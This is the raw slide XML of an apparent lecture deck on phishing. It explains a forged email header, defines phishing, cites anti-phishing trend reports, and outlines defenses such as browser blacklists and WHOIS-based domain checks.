          <a:xfrm>
            <a:off x="457200" y="0"/>
            <a:ext cx="8229600" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>An example of forge email header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="64516" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533400" y="914400"/>
          <a:ext cx="8077200" cy="4419600"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s1031" name="Bitmap Image" r:id="rId3" imgW="7182853" imgH="3115110" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Bitmap Image" r:id="rId3" imgW="7182853" imgH="3115110" progId="PBrush">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914400"/>
                        <a:ext cx="80772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4520" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="3733800"/>
            <a:ext cx="4572000" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here, the second Received: line indicates </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that "cola.bekkoame.or.jp" received the mail </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from a machine which identified itself as </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"cola.bekkoame.or.jp", but was in fact </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>"ip21.san-luis-obispo.ca.pub-ip.psi.net". </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This mail was probably forged from a </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>psi.net dial-in account.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64521" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-699637">
            <a:off x="6125084" y="2679592"/>
            <a:ext cx="227727" cy="1009932"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 71875"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEn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20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64520"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="645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4521"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="11" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64521"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="645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0" grpId="0" animBg="1"/>
      <p:bldP spid="645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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="152400"/>
            <a:ext cx="7924800" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Phishing attack trend</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5867400"/>
            <a:ext cx="8153400" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Source: Anti-Phishing Working Group, http://www.antiphishing.org/resources/apwg-reports/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31746" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1143000"/>
            <a:ext cx="7371938" cy="41910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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="152400"/>
            <a:ext cx="7924800" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Phishing attack trend (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5867400"/>
            <a:ext cx="8153400" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Source: Anti-Phishing Working Group, http://www.antiphishing.org/resources/apwg-reports/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31747" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="1066800"/>
            <a:ext cx="5581650" cy="4356049"/>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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="152400"/>
            <a:ext cx="7924800" cy="609600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Phishing attack trend (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1030" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5867400"/>
            <a:ext cx="8153400" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Source: Anti-Phishing Working Group, http://www.antiphishing.org/resources/apwg-reports/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32770" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="1295400"/>
            <a:ext cx="6184768" cy="3976688"/>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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="399393" y="0"/>
            <a:ext cx="8439807" cy="723900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Anti-phishing techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25605" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="998483"/>
            <a:ext cx="8153400" cy="5249917"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Browser-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Website domain checking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Email content-based</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Legislation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304801" y="0"/>
            <a:ext cx="8458200" cy="735724"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Fighting phishing attacks (browser-based)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49157" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="8529145" cy="1639613"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>White and blacklisted websites</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browsers are aware of these lists</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>FireFox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, Internet Explorer, Chrome, Opera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74638"/>
            <a:ext cx="8229600" cy="487362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>What is phishing attack?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4099" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="8229600" cy="4906963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="533400" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Web based identity theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Phisher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> assumes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>identity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> of a legitimate organization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="533400" indent="-533400">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> victims to visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fraudulent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> websites and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>give away </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>personal credential information </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>User id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Social Security Number</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Bank account information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304801" y="0"/>
            <a:ext cx="8458200" cy="735724"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Fighting phishing attacks (IE warning)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1219200"/>
            <a:ext cx="7772400" cy="5029200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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457199" y="0"/>
            <a:ext cx="8305801" cy="735724"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Fighting phishing attacks (information sharing)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48130" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="554421" y="823748"/>
            <a:ext cx="8208579" cy="5424652"/>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304801" y="0"/>
            <a:ext cx="8458200" cy="735724"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Fighting phishing attacks (information sharing)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49155" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1264027" y="1219200"/>
            <a:ext cx="7422773" cy="4645572"/>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457199" y="0"/>
            <a:ext cx="8305801" cy="735724"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Fighting phishing attacks (DNS record)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49157" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="935421"/>
            <a:ext cx="8529145" cy="5312978"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Heuristics can detect suspicious website domain </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Short lived (1-2 days)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>No record in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHOIS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> database (Domain ownership and IP address)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr 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457199" y="0"/>
            <a:ext cx="8305801" cy="735724"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Fighting phishing attacks (WHOIS lookup example)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48131" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="877614" y="998483"/>
            <a:ext cx="7809186" cy="4666593"/>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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="0"/>
            <a:ext cx="8305801" cy="735724"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Fighting phishing attacks (WHOIS lookup example)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48132" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1102764" y="1208690"/>
            <a:ext cx="7032243" cy="4309241"/>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cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="551793" y="1513490"/>
            <a:ext cx="7592082" cy="3972909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551793" y="5749159"/>
            <a:ext cx="8439807" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="Tahoma" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
